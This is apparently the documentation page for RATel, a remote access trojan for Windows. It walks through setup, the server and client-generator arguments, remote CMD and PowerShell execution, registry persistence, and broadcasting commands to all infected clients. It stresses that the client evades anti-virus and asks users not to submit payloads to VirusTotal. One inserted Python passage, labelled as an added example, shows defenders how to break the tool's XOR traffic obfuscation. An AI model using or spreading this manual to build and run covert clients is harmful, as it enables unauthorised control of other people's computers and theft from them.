RATel: RAT to Take Control of a Windows Machine

RAT-el is an open source penetration test tool that allows you to take control of a Windows machine. It works on a client-server model: the server sends commands, and the client executes them and sends the result back to the server. The client is completely undetectable by anti-virus software.

Please do not upload to VirusTotal

To prevent RATel from being detected by antivirus, please do not upload the payload to VirusTotal. Each month I will test myself whether the payload gets detected by antivirus, so you will have a photo every month to prove RATel’s discretion.

Screenshots RATel

Features

RATelServer:

  • Multiple Connections
  • Broadcast commands to all clients
  • Stores client information in the database
  • Encryption of data on the network via XOR
  • Token management system to identify clients

Client:

  • Encryption of data sent over the network
  • Startup persistence
  • Remote command execution via CMD
  • Remote command execution via Powershell
  • Encryption of data on the network via XOR
  • Automatic persistence when running the client
  • Automatic reconnection

RATelGenerator:

  • Automatic client compilation

Installations

Windows Installation

Installation and configuration of all dependencies on Windows:

  • First step: Download and install Python3 and MinGW.

MinGW:

If you want to compile RATs (clients) from Windows, you must have MinGW on your machine.

  1. Download MinGwInstaller from the MinGW site, then install it.
  2. Once MinGwInstaller is installed, run it, check “mingw32-gcc-g++”, then click on “installation” and then on “Changes”.
  3. Once all MinGW dependencies are installed, copy the path of the folder containing the MinGW binaries (normally “C:\MinGw\bin”) and add this folder to the system PATH variable.
Install MinGw

Python3:

You must have Python3 on your machine, because the server (RATelServer.py) and the generator (RATelGenerator.py) are both coded in Python3.

  1. Download Python 3 for your architecture from the Python website.
  2. Install Python3.

Make sure that Python and G++ (MinGW) can be run from the Windows command prompt; if one of the programs does not run, add the program path to the PATH variable on your system.

Install Python3

  • Second step: Download the RATel repository.

  1. Go to the RATel repository on GitHub (https://github.com/FrenchCisco/RATel).
  2. Click on “Code” and then click on “Download ZIP”.
  3. Once the download finishes, you will have a zip file.
  4. Extract the zip file.

Download RATel

  • Third step: Run win_setup.py

  1. Go to the “RATel” folder you downloaded and unzipped.
  2. Then run the script “win_setup.py”.

The “win_setup.py” script installs all required Python libraries, then checks that MinGW and Python are accessible from the Windows command prompt.

If you get “Finished installation”, all dependencies for the RATel project are installed on your machine. If you get an error message, check all the steps previously mentioned in this tutorial. If you still get an error message, please open an issue on the repository’s issues page.

Run win_setup

Linux Installation

This documentation is based on a Debian configuration, so the steps will be identical for Debian-derived distributions like Kali Linux, Ubuntu, Tails, PureOS, etc. I did not write documentation for other distributions, but the principle remains the same.

  • First step: Download and install Git, Python3 and MinGW.

To avoid any problems, update your system first:

sudo apt-get update && sudo apt-get upgrade

Install Git, Python3, Pip3 and Mingw-w64:

sudo apt-get install git python3 python3-pip mingw-w64

  • Second step: Clone the RATel repository.

git clone https://github.com/FrenchCisco/RATel

  • Third step: Install the dependencies for Python3.

Go to the “RATel/setup” folder.

cd RATel/setup

Install the dependencies.

pip3 install -r requirement.txt

RATelServer

RATelServer Arguments

This documentation explains the operation of the server (RATelServer.py) and its functionalities.

The behaviour of the server varies depending on the arguments passed, which is why this is a fairly general description of the server.

When connecting a new client to the server, the client sends the first information: the token, the current RAT folder, the user rights and the user login. This step is called HANDSHAKE.

For each new client, the server assigns an ID which is presented as a session number. Once the HANDSHAKE is finished, the server stores all the information received (Session number, IP address, port, RAT path, user rights and user login) in a SQLite database.

This allows the server, in case of network or other problems, to identify clients and reconnect them.

Arguments

Argument, syntax, example and comment for each server option:

  -i / --ip
    Syntax: --ip <ip of server>
    Example: -i 127.0.0.1
    The IP address of the server; this is handy if you have several IP addresses.

  -p / --port
    Syntax: --port <port>
    Example: --port 4444
    The listening port of the server.

  -t / --time
    Syntax: --time <seconds>
    Example: --time 120
    The interval in seconds at which a message is automatically sent to check whether the connection is alive or dead.

  -pa / --password
    Syntax: --password <your password>
    Example: --password ciscoTheBoss
    The password for encrypting and decrypting data on the network. If the password is not the same as the client’s, it will be impossible to decrypt the messages.

  -c / --clean
    Syntax: --clean
    Example: --clean
    Cleans up all data in the SQLite database.

  -d / --display
    Syntax: --display
    Example: --display
    Disables the display of client information (logout and incoming connection).

  -h / --help
    Syntax: --help
    Example: --help
    Shows this help message.

Example of command:

/usr/bin/python3 RATelServer.py --port 8888 --password LinuxIsBestOS --time 120 --clean

This command listens on port 8888, encrypts and decrypts data with the password LinuxIsBestOS, pings the clients every 2 minutes and deletes the database data.

Usage RATelServer

RATelServer works with a system of modes. Each mode has its own specific commands.

  • Main mode:

The main mode is the server’s default mode. It allows you to do many things, such as:

Argument, syntax and comment for each main mode command:

  -h / --help
    Syntax: --help
    Displays all main mode commands.

  -ls / --list
    Syntax: --list
    Displays all clients with their information.

  -t / --target
    Syntax: --target <session_ID>
    Selects a client (Session mode).

  -cde / --connectionDisplayEnable
    Syntax: -cde
    Enables the display of information about the client (connection and disconnection).

  -cdd / --connectionDisplayDisable
    Syntax: -cdd
    Disables the display of client information (connection and disconnection).

  --broadcast
    Syntax: --broadcast
    Starts the broadcast mode.

  --exit
    Syntax: --exit
    Stops the server.

Main mode
  • Session mode:

The session mode allows you to select a session (client) and interact with it, for example to execute a command, start persistence, etc.

Argument, syntax and comment for each session mode command:

  -h / --help
    Syntax: --help
    Displays all main mode commands.

  -c
    Syntax: -c <"command">
    Executes a command on all clients and does not send the result (don’t forget to put the command in quotation marks).

  --command
    Syntax: --command
    Starts a command prompt (cmd.exe) on the remote machine.

  --powershell
    Syntax: --powershell
    Starts a PowerShell prompt (powershell.exe) on the remote machine.

  --persistence
    Syntax: --persistence
    Makes the client persistent at startup by changing registry keys.

  --destruction
    Syntax: --destruction
    Deletes and disconnects all clients.

  --disconnection
    Syntax: --disconnection
    Coming soon.

  -b / --back
    Syntax: --back
    Back to menu.

Session mode

Warning

Any commands executed with the ‘--command’ or ‘--powershell’ function will not be encrypted on the network. If you want to execute encrypted commands, use the argument -c.
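The -pa/--password option and the warning above deserve a caveat for anyone analysing captured traffic: XOR with a shared password is obfuscation, not encryption. The Python below is an added example, not code from RATel; it models the scheme as repeating-key XOR (an assumption, since the page does not describe the exact message layout or XOR mode) and shows that one known handshake field, such as the RAT folder recovered from host forensics, is enough to recover the password from a captured message.

```python
from itertools import cycle
from typing import List, Optional

# Model of "encryption via XOR": repeating-key XOR with the shared password.
# ASSUMED scheme; the page does not describe RATel's actual message format.
def xor_crypt(data: bytes, password: str) -> bytes:
    """Encryption and decryption are the same operation for XOR."""
    key = password.encode()
    if not key:
        raise ValueError("empty password")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def guess_key_lengths(ciphertext: bytes, known: bytes, offset: int) -> List[int]:
    """Key lengths consistent with a known-plaintext segment: the keystream
    (ciphertext XOR known) must repeat with that period. Needs a segment at
    least twice as long as the password; the smallest result is the period."""
    stream = bytes(c ^ p for c, p in zip(ciphertext[offset:offset + len(known)], known))
    return [n for n in range(1, len(stream) // 2 + 1)
            if all(stream[i] == stream[i % n] for i in range(len(stream)))]

def recover_key(ciphertext: bytes, known: bytes, offset: int, key_len: int) -> Optional[bytes]:
    """Recover the repeating key from plaintext known to sit at `offset`.
    Returns None when the segment does not cover every key position."""
    if len(known) < key_len:
        return None
    key = bytearray(key_len)
    for i, p in enumerate(known):
        key[(offset + i) % key_len] = ciphertext[offset + i] ^ p
    return bytes(key)

# Constructed sample: a handshake-like message carrying the fields the page
# lists, in a layout invented here, encrypted with the page's example password.
PASSWORD = "LinuxIsBestOS"
PLAINTEXT = b"token=0123456789abcdef;path=C:\\Users\\alice\\AppData\\Roaming\\svc.exe;rights=user;login=alice"
CIPHERTEXT = xor_crypt(PLAINTEXT, PASSWORD)

def recover_password_from_path() -> Optional[str]:
    """The analyst knows the RAT folder from the host, so the `path=` field is
    known plaintext at a known offset; that alone yields the whole password."""
    offset = PLAINTEXT.index(b"path=")      # offset located in the capture
    known = PLAINTEXT[offset:offset + 40]   # 40 known bytes, > 2 * len(password)
    lengths = guess_key_lengths(CIPHERTEXT, known, offset)
    if not lengths:
        return None
    key = recover_key(CIPHERTEXT, known, offset, lengths[0])
    return key.decode(errors="replace") if key else None

if __name__ == "__main__":
    print("recovered password:", recover_password_from_path())  # LinuxIsBestOS
```

Once the password is known, every other captured message from that client, including the handshake token and login, decrypts with the same xor_crypt call.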

  • Broadcast mode:

The broadcast mode allows you to send a command to all clients.

Argument, syntax and comment for each broadcast mode command:

  -h / --help
    Syntax: --help
    Displays all session mode commands.

  -ls / --list
    Syntax: --list
    Starts a command prompt (cmd.exe) on the remote machine.

  -c
    Syntax: -c <"command">
    Executes a command on all clients and does not send the result (don’t forget to put the command in quotation marks).

  --persistence
    Syntax: --persistence
    Makes all clients persistent at startup by modifying the registry keys.

  --destruction
    Syntax: --destruction
    Removes the client on all clients and cuts the connections.

  --disconnection
    Syntax: --disconnection
    Coming soon.

  -b / --back
    Syntax: --back
    Back to menu.

Broadcast mode

Example command: sends the explorer.exe command to all clients

broadcast> -c "explorer.exe"

Usage RATelGenerator

RATelGenerator compiles RATs (clients); RATs are compiled with MinGW.

The script accepts many arguments, which give you wider and more targeted control according to your situation or requirements.

The behaviour of the RAT changes according to the arguments passed. The only mandatory argument is the IP address, which determines which server the RAT will try to connect to.

Arguments:

Argument, syntax, example and comment for each generator option:

  -h / --help
    Syntax: --help
    Example: --help
    Shows this help message.

  -a / --auto
    Syntax: --auto
    Example: --auto
    Activates persistence mode as soon as the client is executed.

  -p / --port
    Syntax: --port <port>
    Example: --port 8888
    The port number the client should connect to.

  -i / --ip
    Syntax: --ip <address ip>
    Example: --ip 192.168.1.32
    The IP address of the server.

  -r / --reconnect
    Syntax: --reconnect <time>
    Example: --reconnect 10
    The wait time between each reconnection attempt to the server (in seconds).

  -n / --name
    Syntax: --name <name of rat>
    Example: --name my_rat.exe
    The name of the RAT.

  -rs / --registry
    Syntax: --registry <name>
    Example: --registry win_key
    The name of the string value of the key used for persistence.

  -pa / --password
    Syntax: --password <password>
    Example: --password linusIsBestOS
    The password to encrypt and decrypt data on the network.

Example:

/usr/bin/python3 RATelGenerator.py --ip 192.168.1.34 --port 8888 --name RATclient.exe --password linuxIsBestOS

Disclaimer

The use of this software on any device that is not yours is prohibited. If you use RATel on a machine that does not belong to you, I will in no way be responsible for your actions.
